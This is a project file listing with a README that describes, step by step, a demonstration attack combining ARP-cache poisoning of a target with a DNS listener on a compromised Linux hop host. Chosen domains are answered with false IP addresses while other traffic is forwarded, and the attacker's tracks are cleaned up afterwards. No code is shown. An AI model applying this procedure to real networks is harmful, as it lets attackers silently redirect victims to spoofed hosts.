| Name | Modified | Size | Downloads / Week |
|---|---|---|---|
| README.txt | 2012-06-30 | 1.5 kB | |
| DNS.tgz | 2012-06-30 | 2.0 kB | |
| Totals: 2 Items | 3.6 kB | 0 |
Short demonstration of how arp-cache poisoning can be used in conjunction with DNS tunneling to execute DNS poisoning attacks without owning the DNS server and actually in a way that will be much be less visible to the target.
Suppose A is the attacker and T is the target. L is a compromised linux host which A uses as a hop point. D is the legitimate DNS server in the network.
1. A adds two rules to L's iptables:
- listen for incoming DNS requests and redirect them to the DNS listener DNServer.pl, configures DNServer.pl with the address of the real DNS server so most DNS will continue to work correctly and non-maliciously.
- perform SNAT on all other incoming packets
2. A turns on packet forwarding so that when he arp-poisons T, T does not notice any change in traffic volume
3. A arp-poisons T to redirect traffic from D to A.
- if traffic not DNS, the traffic is forwarded as if A is the gateway for T to D
- if traffic is DNS it is redirected to the DNS listener
- if host requested is not on a specified list, the request is tunneled to D
- if host request is on the list, spit back a false IP for the domain. You could even spit back the IP address for A if you have other tunnels set up. In any case the host is going to be thinking it's talking to, say sourceforge.net when it isn't lol.
4. Post-infection:
- reset L's behavior to whatever it should be
- un-poison T's arp cache so that its traffic to D is normal again
Theoretically this entire process could take place in under a minute.